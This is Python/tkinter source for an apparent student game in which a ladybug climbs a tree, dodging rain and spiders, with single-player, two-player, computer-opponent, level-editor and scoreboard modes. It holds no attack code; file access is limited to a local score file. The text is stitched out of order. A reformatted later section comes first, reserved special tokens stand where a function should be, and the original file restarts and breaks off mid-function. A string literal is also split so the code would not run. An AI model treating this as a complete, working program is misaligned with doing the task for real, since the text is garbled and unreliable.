        side = random.choice(data.sides)
        if side == 'l':
            if data.pause1Drop != True:
                data.invincible.append(Invincible(140, 0))
            if data.pause2Drop != True:
                data.invincible.append(Invincible(550, 0))
        elif side == 'r':
            if data.pause1Drop != True:
                data.invincible.append(Invincible(344, 0))
            if data.pause2Drop != True:
                data.invincible.append(Invincible(755, 0))
    if data.time % 66 == 0:
        side = random.choice(data.sides)
        if side == 'l':
            data.scaryBug.append(ScaryBug(140, 750))
            data.scaryBug.append(ScaryBug(550, 750))
        elif side == 'r':
            data.scaryBug.append(ScaryBug(344, 750))
            data.scaryBug.append(ScaryBug(750, 750))


# Keyboard in AI mode: 'r' restarts; Left/Right swap the human player
# between the two lanes while the game is undecided.
def AIKeyPressed(event, data):
    if event.keysym == 'r':
        init(data)
    if data.winner == None:
        if event.keysym == 'Left' and data.onLeft1 == False:
            data.onLeft1 = True
            data.player2X = 550
        elif event.keysym == 'Right' and data.onLeft1 == True:
            data.onLeft1 = False
            data.player2X = 750


# Only the home button is clickable in AI mode.
def AIMousePressed(event, data):
    checkHome(event, data)


# Tick AI mode: run dodge/hit checks at two ranges (31px lookahead for
# dodging, 13px for contact), move drops, climb both players, spawn
# rain, and process power-ups. First player to y<15 wins.
def AITimerFired(data):
    if data.winner == None:
        if data.Invincible1 == False:
            hitAI1(data, 31)
        if data.Invincible2 == True:
            pass
        elif data.Invincible2 == False:
            hitAI2(data, 31)
        for coconut in data.coconutsAI1:
            if data.pause1Drop == False:
                coconut.onTimerFired(data)
        for coconut in data.coconutsAI2:
            if data.pause2Drop == False:
                coconut.onTimerFired(data)
        if data.Invincible1 == False:
            hitAI1(data, 13)
        if data.Invincible2 == True:
            pass
        elif data.Invincible2 == False:
            hitAI2(data, 13)
        data.player1Y -= data.speedAI
        if data.player1Y < 15 and data.player2Y > 15:
            data.winner = 'player1'
        if data.player1Y > 40:
            data.time += 1
            coconutShotAI(data)
        data.player2Y -= data.speedAI
        if data.player2Y < 15 and data.player1Y > 15:
            data.winner = 'player2'
        if data.player2Y > 40:
            data.time += 1
            coconutShotAI(data)
        if data.player1Y < 15 and data.player2Y < 15:
            data.winner = 'tie'
        for powerUp in data.powerUps:
            powerUp.onTimerFired(data)
        hitPause(data)
        powerUpAITimerFired(data)


# Move umbrella power-ups and spiders, run their collision checks, and
# expire each side's active power-up after 120 pixels of climbing.
def powerUpAITimerFired(data):
    for powerUp in data.invincible:
        powerUp.onTimerFired(data)
    hitInvincible(data)
    for bug in data.scaryBug:
        bug.onTimerFired(data)
    hitScaryBug(data)
    if data.start1 != None:
        if abs(data.start1 - data.player1Y) >= 120:
            data.pause1Drop = False
            data.Invincible1 = False
    if data.start2 != None:
        if abs(data.start2 - data.player2Y) >= 120:
            data.pause2Drop = False
            data.Invincible2 = False


# Draw the split-screen AI mode: computer on the left, human on the
# right, with drops, power-ups, both bugs and the winner overlay.
def AIRedrawAll(canvas, data):
    canvas.create_image(data.width / 4, data.height / 2, image=data.
        halfBackground)
    canvas.create_image(3 * data.width / 4, data.height / 2, image=data.
        halfBackground)
    canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10
        )
    canvas.create_line(0, 20, data.width, 20)
    for coconut in data.coconutsAI1:
        coconut.draw(canvas)
    for coconut in data.coconutsAI2:
        coconut.draw(canvas)
    canvas.create_text(50, 40, text='Computer', font='Arial 15 bold', fill=
        'yellow')
    canvas.create_text(450, 40, text='Player 1', font='Arial 15 bold', fill
        ='yellow')
    drawPowerups(canvas, data)
    canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)
    canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)
    AIWinner(canvas, data)
    drawHome(canvas, data)


# Winner overlay for AI mode ('player1' is the computer).
def AIWinner(canvas, data):
    if data.winner == 'player1':
        canvas.create_rectangle(0, 0, data.width, data.height, fill='black')
        canvas.create_image(data.width / 2, data.height / 2, image=data.
            winScreen)
        canvas.create_image(300, 320, image=data.winBug)
        canvas.create_text(data.width / 2, 100, text='The Computer Won :(',
            font='Arial 23 bold', fill='yellow')
    elif data.winner == 'player2':
        canvas.create_rectangle(0, 0, data.width, data.height, fill='black')
        canvas.create_image(data.width / 2, data.height / 2, image=data.
            winScreen)
        canvas.create_image(300, 320, image=data.winBug)
        canvas.create_text(data.width / 2, 100, text=
            'You Made it! You Won!', font='Arial 23 bold', fill='yellow')
    elif data.winner == 'tie':
        canvas.create_rectangle(0, 0, data.width, data.height, fill='black')
        canvas.create_image(data.width / 2, data.height / 2, image=data.
            winScreen)
        canvas.create_image(300, 320, image=data.winBug)
        canvas.create_text(data.width / 2, 100, text=
            'Tie!
You Both Made it!', font='Arial 23 bold', fill='yellow')


# Restart shortcut on the scoreboard screen.
def scoreboardKeyPressed(event, data):
    if event.keysym == 'r':
        init(data)


# Only the home button is clickable on the scoreboard.
def scoreboardMousePressed(event, data):
    checkHome(event, data)


# Reuse the difficulty screen's rain animation on the scoreboard.
def scoreboardTimerFired(data):
    difficultyTimerFired(data)


# Draw the scoreboard: re-reads score.txt, parses "score,name" lines,
# sorts numerically by score and displays the top data.numScores.
def scoreboardRedrawAll(canvas, data):
    canvas.create_image(data.width / 2, data.height / 2, image=data.background)
    canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)
    for drop in data.editorDrops:
        drop.draw(canvas)
    canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',
        font='Arial 30 bold', fill='yellow')
    canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=
        'Arial 20 bold', fill='yellow')
    drawHome(canvas, data)
    data.savedScores  # NOTE(review): stray no-op expression statement
    data.savedScores = readFile('score.txt')
    score = data.savedScores.splitlines()
    scores = []
    for line in score:
        scores.append(line.split(','))
    scores = sorted(scores, key=lambda x: int(x[0]))
    top5 = scores[-data.numScores:]
    top5.reverse()
    for i in range(len(top5)):
        canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=
            top5[i], font='Arial 18 bold', fill='yellow')


# Restart shortcut on the help screen.
def helpKeyPressed(event, data):
    if event.keysym == 'r':
        init(data)


<|reserved_special_token_0|>


# Reuse the difficulty screen's rain animation on the help screen.
def helpTimerFired(data):
    difficultyTimerFired(data)


# Draw the help/instructions image plus rain and the home button.
def helpRedrawAll(canvas, data):
    canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)
    for drop in data.editorDrops:
        drop.draw(canvas)
    drawHome(canvas, data)


# Standard run scaffold: builds the Tk window, wires mouse/key/timer
# events to the mode dispatchers, and starts the main loop.
# NOTE(review): the width/height defaults look like typos, but init()
# overrides them (data.width = data.height = 800) before the canvas is
# created, so the window still comes out 800x800.
def run(width=15000, height=25000):

    def redrawAllWrapper(canvas, data):
        canvas.delete(ALL)
        redrawAll(canvas, data)
        canvas.update()

    def mousePressedWrapper(event, canvas, data):
        mousePressed(event, data)
        redrawAllWrapper(canvas, data)

    def keyPressedWrapper(event, canvas, data):
        keyPressed(event, data)
        redrawAllWrapper(canvas, data)

    def timerFiredWrapper(canvas, data):
        timerFired(data)
        redrawAllWrapper(canvas, data)
        # pause, then schedule the next tick
        canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)

    class Struct(object):
        pass
    data = Struct()
    data.width = width
    data.height = height
    data.timerDelay = 100
    root = Tk()
    init(data)
    canvas = Canvas(root, width=data.width, height=data.height)
    canvas.pack()
    root.bind('<Button-1>', lambda event: mousePressedWrapper(event,
        canvas, data))
    root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))
    timerFiredWrapper(canvas, data)
    root.mainloop()
    print('bye!')


<|reserved_special_token_0|>
<|reserved_special_token_1|>
#Arushi Patel (aruship)
from tkinter import *
import random
######################################
#images taken from wikipedia,pixabay,
#trans americas, clipartpanda,pngimg,
#findicons, microsoft word
######################################
####################################
# init
####################################
# Reset all shared game state on data (chained through init1..initAI).
def init(data):
    data.score =0
    data.mode = "splashScreen"
    data.timerDelay = 100
    data.height = 800
    data.width = 800
    data.speed = 10
    data.speedAI = 12
    data.speedAI2 = 12
    data.switchOnProgress = False
    data.r = 25
    data.cx= 280
    data.cy=750
    data.onLeft1, data.onLeft2 = True, True
    data.win= False
    data.coconuts = []
    data.powerUps = []
    data.coconuts1 = []
    data.coconuts2 = []
    data.coconutsAI1 =[]
    data.coconutsAI2 = []
    data.invincible = []
    data.pauseDrops = False
    data.pause1Drop = False
    data.pause2Drop = False
    init1(data)
# Load all image assets (GIF files must sit next to the script).
def init1(data):
    data.beInvincible = False
    data.Invincible1 = False
    data.Invincible2 = False
    data.scaryBug = []
    data.time = 0
    data.coconutFall = False
    data.sides = ["r", "l"]
    data.level = 1
    data.splashScreenTime = 0
    data.splashScreenDrops = []
    data.background= PhotoImage(file="tree.gif")
    data.deadScreen = PhotoImage(file = "deadBug.gif")
    data.ladyBug = PhotoImage(file = "lady.gif")
    data.winScreen= PhotoImage(file = "treeTop1.gif")
    data.winBug = PhotoImage(file = "littleBug.gif")
    data.halfBackground = PhotoImage(file = "halfTree.gif")
    data.umbrella = PhotoImage(file = "umbrella2.gif")
    data.spider = PhotoImage(file = "spider.gif")
    data.hourGlass = PhotoImage(file = "hourGlass.gif")
    data.splashScreen = PhotoImage(file = "splash.gif")
    init2(data)
def init2(data):
    # (body of init2) player positions, editor state and button images
    data.tbg= PhotoImage(file = "tbg2.gif")
    data.click = PhotoImage(file = "click.gif")
    data.notClick = PhotoImage(file = "notClick.gif")
    data.player1X = 150
    data.player1Y = 750
    data.player2X = 550
    data.player2Y = 750
    data.winner = None
    data.speed = 12
    data.speed2 = 12
    data.editorTime = 0
    data.editorDrops = []
    data.margin = 100
    data.enter = False
    data.powerUpsEditor = None
    data.yourSpeed = None
    data.rainSpeed = None
    data.slow= data.notClick
    data.medium = data.notClick
    data.fast = data.notClick
    data.drizzle = data.notClick
    data.rain =data.notClick
    data.thunderstorm = data.notClick
    init3(data)
# More button/power-up state, remaining assets, and the saved scores.
def init3(data):
    data.yes = data.notClick
    data.no = data.notClick
    data.enter = data.notClick
    data.levelEditorLives =2
    data.rSpeed = None
    data.start = None
    data.start1 = None
    data.start2 = None
    data.difficulty = None
    data.mode1 = data.notClick
    data.mode2 = data.notClick
    data.mode3 = data.notClick
    data.mode4 = data.notClick
    data.mode5 = data.notClick
    data.mode6 = data.notClick
    data.home = PhotoImage(file = "home.gif")
    data.helpScreen = PhotoImage(file = "help1.gif")
    data.title = PhotoImage(file = "title.gif")
    data.scoreList = []
    data.spotList = [270,364,458,552, 646, 740]
    data.savedScores = readFile("score.txt")
    if data.mode == "levelCreated":
        setEverything(data)
    initsplashScreenNumbers(data)
# Layout constants for the splash screen buttons and gameplay numbers.
def initsplashScreenNumbers(data):
    data.splashButtonY = 425
    data.p1ButtonX= 225
    data.p2ButtonX = 290
    data.edButton = 355
    data.diffButton = 425
    data.helpButton = 490
    data.sboardButton = 555
    data.hitPenalty = 75
    data.splashText = data.height/2-20
    data.lives = 2
    data.levelMax = 8
    data.lane = 94
    data.Player1Min= 270
    data.Player1Max = 740
    data.homeX =50
    data.homeY = 650
    initScoreBoardHelp(data)
    init1Player(data)
# Layout constants for the scoreboard and help screens.
def initScoreBoardHelp(data):
    data.tbgY=5*data.height/12
    data.txtTScore = 150
    data.S_P = 220
    data.numScores = 5
    data.scorePos = data.height/10
    data.scoreShift = 270
    data.helpY = data.height/2-20
    data.name = ""
    data.printName = ""
    data.hit = False
    initAI(data)
# Single-player constant(s).
def init1Player(data):
    data.buffer = 40
# Layout constants and difficulty values for AI mode.
def initAI(data):
    data.AITY = 225
    data.easyX = 200
    data.easyY = 300
    data.medX =400
    data.hardX = 600
    data.enterY = 450
    data.difS = 4
    data.difM = 6
    data.difH = 8
    data.last = 500
    data.enterX = 575
    data.PUT = 450
    data.RST = 350
    data.YST = 250
####################################
# mode dispatcher
####################################
# Route mouse events to the handler for the current mode.
def mousePressed(event, data):
    if (data.mode == "splashScreen"): splashScreenMousePressed(event, data)
    elif (data.mode == "1Player"): playerMousePressed(event, data)
    elif (data.mode == "2Player"): twoPlayerMousePressed(event, data)
    elif (data.mode == "editor"): editorMousePressed(event,data)
    elif (data.mode == "levelCreated"): levelCreatedMousePressed(event,data)
    elif (data.mode == "AI"): AIMousePressed(event, data)
    elif (data.mode == "difficulty"): difficultyMousePressed(event, data)
    elif (data.mode == "scoreboard"): scoreboardMousePressed(event, data)
    elif (data.mode == "help"): helpMousePressed(event, data)
# Route key events to the handler for the current mode.
def keyPressed(event, data):
    if (data.mode == "splashScreen"): splashKeyPressed(event, data)
    elif (data.mode == "1Player"):playerKeyPressed(event, data)
    elif (data.mode == "2Player"):twoPlayerKeyPressed(event, data)
    elif (data.mode == "editor"): editorKeyPressed(event, data)
    elif (data.mode == "levelCreated"): levelCreatedKeyPressed(event,data)
    elif (data.mode == "AI"): AIKeyPressed(event, data)
    elif (data.mode == "difficulty"): difficultyKeyPressed(event, data)
    elif (data.mode == "scoreboard"): scoreboardKeyPressed(event, data)
    elif (data.mode == "help"): helpKeyPressed(event, data)
# Route timer ticks to the handler for the current mode.
def timerFired(data):
    if (data.mode == "splashScreen"): splashScreenTimerFired(data)
    elif (data.mode == "1Player"):playerTimerFired(data)
    elif (data.mode == "2Player"):twoPlayerTimerFired(data)
    elif (data.mode == "editor"): editorTimerFired(data)
    elif (data.mode == "levelCreated"): levelCreatedTimerFired(data)
    elif (data.mode == "AI"): AITimerFired(data)
    elif (data.mode == "difficulty"): difficultyTimerFired(data)
    elif (data.mode ==
"scoreboard"): scoreboardTimerFired(data) elif (data.mode == "help"): helpTimerFired(data) def redrawAll(canvas, data): if (data.mode == "splashScreen"): splashScreenRedrawAll(canvas, data) elif (data.mode == "1Player"):playerRedrawAll(canvas, data) elif (data.mode == "2Player"):twoPlayerRedrawAll(canvas, data) elif (data.mode == "editor"): editorRedrawAll(canvas, data) elif (data.mode == "levelCreated"): levelCreatedRedrawAll(canvas,data) elif (data.mode == "AI"): AIRedrawAll(canvas, data) elif (data.mode == "difficulty"): difficultyRedrawAll(canvas, data) elif (data.mode == "scoreboard"): scoreboardRedrawAll(canvas, data) elif (data.mode == "help"): helpRedrawAll(canvas, data) #################################### # splashScreen mode #################################### def splashScreenMousePressed(event, data): #checks for selection of mode if data.splashButtonY-2*data.r <= event.x <=data.splashButtonY+2*data.r: if data.p1ButtonX-data.r<=event.y<=data.p1ButtonX+data.r: data.mode = "1Player" if data.p2ButtonX-data.r<=event.y<=data.p2ButtonX+data.r: data.mode = "2Player" if data.edButton-data.r<=event.y<=data.edButton+data.r: data.mode = "editor" if data.diffButton-data.r<=event.y<=data.diffButton+data.r: data.mode = "difficulty" if data.helpButton-data.r<=event.y<=data.helpButton+data.r: data.mode = "help" if data.sboardButton-data.r<=event.y<=data.sboardButton+data.r: data.mode = "scoreboard" def splashKeyPressed(event, data): pass def splashScreenTimerFired(data): data.splashScreenTime += 1 if data.splashScreenTime %2 ==1: rainDropSplash(data) for drop in data.splashScreenDrops: drop.onTimerFired(data) def splashScreenButtons(canvas, data): canvas.create_image(data.splashButtonY,data.p1ButtonX,image = data.mode1) canvas.create_image(data.splashButtonY,data.p2ButtonX,image = data.mode2) canvas.create_image(data.splashButtonY,data.edButton,image = data.mode3) canvas.create_image(data.splashButtonY,data.diffButton,image = data.mode4) 
canvas.create_image(data.splashButtonY,data.helpButton,image = data.mode5) canvas.create_image(data.splashButtonY,data.sboardButton,image =data.mode6) def rainDropSplash(data): xPosition = random.randint(0,800) data.splashScreenDrops.append(Coconuts(xPosition,0)) def splashScreenRedrawAll(canvas, data): canvas.create_image(data.width/2, data.splashText-10, image=data.title) for drop in data.splashScreenDrops: drop.draw(canvas) canvas.create_text(data.width/2, data.splashText, text=""" 1.) Single Player Level Mode 2.) Two-Player Mode 3.) Level Creator Practice Mode 4.) Play Against the Computer 5.) Help and Instructions 6.) Scoreboard """, font="Arial 14 bold", fill = "yellow") splashScreenButtons(canvas, data) #################################### # taken from class notes #################################### def writeFile(path, contents): with open(path, "wt") as f: f.write(contents) def readFile(path): with open(path, "rt") as f: return f.read() #################################### # 1Player mode #################################### #Coconuts (from Mario game) represent the water drops class Coconuts(object): def __init__(self,x,y): self.x = x self.y = y self.r = 9 self.fill = "deep sky blue" self.speed = 30 self.outline= "blue" def draw(self, canvas): canvas.create_polygon(self.x,self.y- 2*self.r, self.x-self.r, self.y, self.x, self.y + self.r, self.x+self.r, self.y, fill = self.fill, outline = self.outline, width = 3) def onTimerFired(self, data): # downward falling motion self.y += self.speed def hit(data): #checks for hitting rain for coconut in data.coconuts: if data.mode == "1Player" or data.mode == "levelCreated": if coconut.y>=data.cy-data.r and coconut.y<=data.cy+data.r: if coconut.x>=data.cx-data.r and coconut.x<=data.cx+data.r: data.cy+=data.hitPenalty if data.mode == "levelCreated": data.lives-=1 elif data.hit ==False and data.level<data.levelMax: data.score -=data.level data.coconuts.remove(coconut) if data.mode == "levelCreated": 
                        data.levelEditorLives-=1
# Drop-vs-player collision for 2Player mode; each side is skipped while
# that player's umbrella (invincibility) power-up is active.
def hit2Player(data):
    if data.mode == "2Player":
        if data.Invincible1 == False:
            #only when powerup isn't active
            for coconut in data.coconuts1:
                if coconut.y>=data.player1Y-data.r \
                and coconut.y<=data.player1Y+data.r:
                    if coconut.x>=data.player1X-data.r and \
                    coconut.x<=data.player1X+data.r:
                        data.player1Y+=data.hitPenalty
                        data.coconuts1.remove(coconut)
        if data.Invincible2 == False:
            #only when powerup isn't active
            for coconut in data.coconuts2:
                if coconut.y>=data.player2Y-data.r and \
                coconut.y<=data.player2Y+data.r:
                    if coconut.x>=data.player2X-data.r and \
                    coconut.x<=data.player2X+data.r:
                        data.player2Y+=data.hitPenalty
                        data.coconuts2.remove(coconut)
# Hour-glass power-up: falls like a drop, drawn as an hour glass.
class PowerUps(Coconuts):
    def __init__(self,x,y):
        super().__init__(x, y)
    def draw(self, canvas, data):
        canvas.create_image(self.x, self.y, image=data.hourGlass)
# Collecting an hour glass pauses the rain for the collecting player;
# data.start* records the pickup height so the effect can expire.
def hitPause(data):
    # checks if hits hour-glass & pauses with flag
    for powerUp in data.powerUps:
        if data.mode == "1Player" or data.mode == "levelCreated":
            if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r:
                if powerUp.x>=data.cx-data.r and powerUp.x<=data.cx+data.r:
                    data.pauseDrops = True
                    data.start = data.cy
                    data.powerUps.remove(powerUp)
        elif data.mode == "2Player" or data.mode == "AI":
            if powerUp.y>=data.player1Y-data.r and \
            powerUp.y<=data.player1Y+data.r:
                if powerUp.x>=data.player1X-data.r and \
                powerUp.x<=data.player1X+data.r:
                    data.pause1Drop = True
                    data.start1 = data.player1Y
                    data.powerUps.remove(powerUp)
            if powerUp.y>=data.player2Y-data.r and \
            powerUp.y<=data.player2Y+data.r:
                if powerUp.x>=data.player2X-data.r and \
                powerUp.x<=data.player2X+data.r:
                    data.pause2Drop = True
                    data.start2 = data.player2Y
                    data.powerUps.remove(powerUp)
# Umbrella power-up: falls like a drop, drawn as an umbrella.
class Invincible(PowerUps):
    def __init__(self,x,y):
        super().__init__(x, y)
    def draw(self, canvas, data):
        canvas.create_image(self.x, self.y, image=data.umbrella)
# Collecting an umbrella makes the collecting player invincible;
# data.start* records the pickup height so the effect can expire.
def hitInvincible(data):
    #checks if hits umbrella powerup
    for powerUp in data.invincible:
        if data.mode == "1Player" or data.mode == "levelCreated":
            if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r:
                if powerUp.x>=data.cx-data.r and powerUp.x<=data.cx+data.r:
                    data.beInvincible = True
                    data.start = data.cy
                    data.invincible.remove(powerUp)
        if data.mode == "2Player" or data.mode == "AI":
            #for player1
            if powerUp.y>=data.player1Y-data.r and \
            powerUp.y<=data.player1Y+data.r:
                if powerUp.x>=data.player1X-data.r and \
                powerUp.x<=data.player1X+data.r:
                    data.Invincible1=True
                    data.start1 = data.player1Y
                    data.invincible.remove(powerUp)
            # for player 2
            if powerUp.y>=data.player2Y-data.r and \
            powerUp.y<=data.player2Y+data.r:
                if powerUp.x>=data.player2X-data.r and \
                powerUp.x<=data.player2X+data.r:
                    data.Invincible2=True
                    data.start2 = data.player2Y
                    data.invincible.remove(powerUp)
# Spider enemy: crawls UP from the bottom; in single-player modes it
# also hops between lanes at random.
class ScaryBug(object):
    def __init__(self,x,y):
        self.x = x
        self.y = y
        self.speed = 25
    def draw(self, canvas, data):
        canvas.create_image(self.x, self.y, image=data.spider)
    def onTimerFired(self, data):
        if data.mode =="2Player" or data.mode == "AI":
            self.speed = 35
        self.y -= self.speed
        if data.mode == "1Player" or data.mode == "levelCreated" and\
        data.time %8 ==0:
            #makes spider dynamically move
            side = random.choice(data.sides)
            if side == "l":
                if self.x -data.lane >=data.Player1Min:self.x-=data.lane
                else: self.x+=data.lane
            elif side == "r":
                if self.x+data.lane<= data.Player1Max:self.x +=data.lane
                else: self.x -=data.lane
# Touching a spider is instant death in single-player modes and an
# instant win for the opponent in 2Player/AI modes.
def hitScaryBug(data):
    # checks for automatic death by spider
    for bug in data.scaryBug:
        if data.mode == "1Player" or data.mode == "levelCreated":
            if bug.y>=data.cy-1.5*data.r and bug.y<=data.cy+1.5*data.r:
                if bug.x>=data.cx-1.5*data.r and bug.x<=data.cx+1.5*data.r:
                    data.hit = True
                    data.lives = 0
                    data.levelEditorLives = 0
        if data.mode == "2Player" or data.mode == "AI":
            if bug.y>=data.player1Y-data.r and bug.y<=data.player1Y+data.r:
                if bug.x>=data.player1X-data.r and bug.x<=data.player1X+data.r:
                    data.winner= "player2"
            if bug.y>=data.player2Y-data.r and bug.y<=data.player2Y+data.r:
                if bug.x>=data.player2X-data.r and
bug.x<=data.player2X+data.r:
                    data.winner= "player1"
# Draw all spiders and both kinds of power-ups.
def drawPowerups(canvas, data):
    for bug in data.scaryBug:
        bug.draw(canvas, data)
    for powerUp in data.powerUps:
        powerUp.draw(canvas, data)
    for powerUp in data.invincible:
        powerUp.draw(canvas, data)
def drawHome(canvas, data):
    #home button in every screen
    canvas.create_image(data.homeX,data.homeY, image= data.home)
# Clicking the home button resets everything back to the splash screen.
def checkHome(event, data):
    if data.homeY-data.r<= event.y <= data.homeY +data.r:
        if data.homeX-data.r<= event.x<=data.homeX+ data.r:
            init(data)
# Spawn rain for 1Player mode; spawn frequency rises with the level,
# with extra drops aimed at the two climbing lanes.
def coconutShot(data):
    if data.level >0 and data.pauseDrops == False:
        if data.time%int(data.levelMax/data.level) == 0 or data.time%6==0:
            #increases drops as level increases
            xPosition1 = random.randint(0,data.Player1Min-data.buffer)
            xPosition2 = random.randint(data.Player1Max+data.buffer,
            data.width +data.buffer)
            data.coconuts.append(Coconuts(xPosition1,0))
            data.coconuts.append(Coconuts(xPosition2,0))
            xPosition4 = random.randint(data.Player1Min-data.buffer,
            data.Player1Max+data.buffer)
            data.coconuts.append(Coconuts(xPosition4,0))
        if data.time %5 ==0:
            xPosition3 = random.randint(0, data.Player1Min-data.buffer)
            data.coconuts.append(Coconuts(xPosition3,0))
        if data.time % int(24/data.level) ==0:
            side = random.choice(data.sides)
            if side == "l":
                data.coconuts.append(Coconuts(data.Player1Min,0))
            elif side =="r":
                data.coconuts.append(Coconuts(data.Player1Max,0))
    powerUpCoconutShot(data)
def powerUpCoconutShot(data): #adds powerUps
    #magic #s toallow for powerups to be added at different times
    if data.time % 60 == 0 and data.time%120 !=0:
        Position = random.choice(data.spotList)
        data.powerUps.append(PowerUps(Position,0))
    if data.time%50 == 0:
        Position = random.choice(data.spotList)
        data.invincible.append(Invincible(Position,0))
    if data.time %100==0:
        Position = random.choice(data.spotList)
        data.scaryBug.append(ScaryBug(Position,750))
# Keys in 1Player mode: 'r' restarts, Left/Right shifts half a lane;
# after winning, keys type the player's name for the scoreboard and
# Return appends "score,name" to score.txt.
def playerKeyPressed(event,data):
    if data.level<data.levelMax and event.keysym == "r":
        init(data)
    if (event.keysym == "Left") and data.cx>=data.Player1Min+(data.lane/2):
        data.cx -=(data.lane)/2
    elif(event.keysym == "Right") and data.cx<=data.Player1Max:
        data.cx +=(data.lane)/2
    if data.level >= data.levelMax:
        #enter name for scoreboard
        if len(event.keysym) ==1:
            if len(data.name) <15:
                data.name += event.keysym
        if event.keysym=="BackSpace":
            data.name = data.name[0:-1]
        if event.keysym == "Return":
            data.scoreList += ((data.score, data.name))
            #saves file
            writeFile("score.txt",
            data.savedScores+str(data.score)+","+data.name+"\n")
            data.mode ="scoreboard"
# Only the home button is clickable in 1Player mode.
def playerMousePressed(event, data):
    checkHome(event, data)
def playerTimerFired(data): #actually pauses, and moves drops/player
    if data.hit== False and data.level<data.levelMax:
        data.cy-=data.speed
        if data.time%5 ==0:
            data.score +=data.level
        if data.cy < 15: #basically made it to the top
            data.level +=1
            data.cy = data.Player1Max + 10
            data.speed +=2
        if data.cy>40: #so drops you can't see don't hit you
            data.time +=1
            if data.pauseDrops !=True:
                coconutShot(data)
        for powerUp in data.powerUps:
            powerUp.onTimerFired(data)
        hitPause(data)
        for powerUp in data.invincible:
            powerUp.onTimerFired(data)
        hitInvincible(data)
        for bug in data.scaryBug:
            bug.onTimerFired(data)
        hitScaryBug(data)
        for coconut in data.coconuts:
            # only want drops to move if not paused
            if data.pauseDrops == False:
                coconut.onTimerFired(data)
            if data.beInvincible == False:hit(data)
        if data.start != None:
            if abs(data.start-data.cy) >= 120:
                #to limit time for powerups to be active
                data.pauseDrops, data.beInvincible = False, False
# Draw 1Player mode: scene, drops, power-ups, bug, HUD, and lose/win
# overlays. magic #s mainly for screen placement
def playerRedrawAll(canvas, data):
    canvas.create_image(data.width/2, data.height/2, image=data.background)
    canvas.create_line(0,20, data.width, 20)
    for coconut in data.coconuts:
        coconut.draw(canvas)
    drawPowerups(canvas, data)
    canvas.create_image(data.cx, data.cy, image=data.ladyBug)
    canvas.create_text(data.width/6,50, text ="Level: %d" %data.level,
    font = "Arial 18 bold", fill = "yellow")
    canvas.create_text(data.width/6,80, text
="Score: %d" %data.score, font = "Arial 18 bold", fill = "yellow") canvas.create_text(2*data.width/3,660, text ="""The greater the level, the more points get added to your score!""", font = "Arial 15 bold", fill = "yellow") if data.hit== True: canvas.create_rectangle(0,0,data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.deadScreen) canvas.create_text(data.width/2,data.height/4, text = "You Lose! Better Luck Next Time!", font = "Helvetica 23 bold", fill = "yellow") canvas.create_text(data.width/2,280, text ="Score: %d" %data.score, font = "Arial 13 bold", fill = "yellow") if data.level >= 8: madeIt(canvas, data) drawHome(canvas, data) def madeIt(canvas, data):# magic #s mainly for screen placement canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,70, text = "You Made it!", font = "Arial 23 bold", fill = "yellow") canvas.create_text(data.width/2,100, text ="Score: %d" %data.score, font = "Arial 15 bold", fill = "yellow") canvas.create_text(data.width/2,375, text ="Congrats! 
Enter your Name!", font = "Arial 15 bold", fill = "yellow") canvas.create_rectangle(data.width/2 - 50, 400, data.width/2+50, 450, fill = "white") canvas.create_text(data.width/2, 425, text = data.name) #################################### # 2Player mode #################################### def drop2Player(data): #adds drops when not paused #magic #s are position of where drops are starting if data.winner ==None and data.pauseDrops == False: if data.time%15==0: xPosition1 = random.randint(0,385) if abs(xPosition1 - 100)>25 and abs(xPosition1 - 360)>25: #so random drops don't interfere with the lane ones if data.pause1Drop != True: data.coconuts1.append(Coconuts(xPosition1,0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(xPosition1 +410,0)) if data.time % 12 ==0: side = random.choice(data.sides) if side == "l": if data.pause1Drop != True: data.coconuts1.append(Coconuts(140,0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(540,0)) elif side =="r": if data.pause1Drop !=True:data.coconuts1.append(Coconuts(344,0)) if data.pause2Drop!=True:data.coconuts2.append(Coconuts(755,0)) powerupDrop2Player(data) def powerupDrop2Player(data): #adds powerups on both screens (in the same position) if data.time % 45 == 0 and data.time%90 !=0: #randomize placement side = random.choice(data.sides) if side == "l": if data.pause1Drop!=True:data.powerUps.append(PowerUps(140,0)) if data.pause2Drop!=True:data.powerUps.append(PowerUps(540,0)) elif side =="r": if data.pause1Drop!=True:data.powerUps.append(PowerUps(344,0)) if data.pause2Drop!=True:data.powerUps.append(PowerUps(755,0)) if data.time%60 == 0: side = random.choice(data.sides) if side == "l": if data.pause1Drop!=True:data.invincible.append(Invincible(140,0)) if data.pause2Drop!=True:data.invincible.append(Invincible(540,0)) elif side =="r": if data.pause1Drop!=True:data.invincible.append(Invincible(344,0)) if data.pause2Drop!=True:data.invincible.append(Invincible(755,0)) if data.time %90==0: side = 
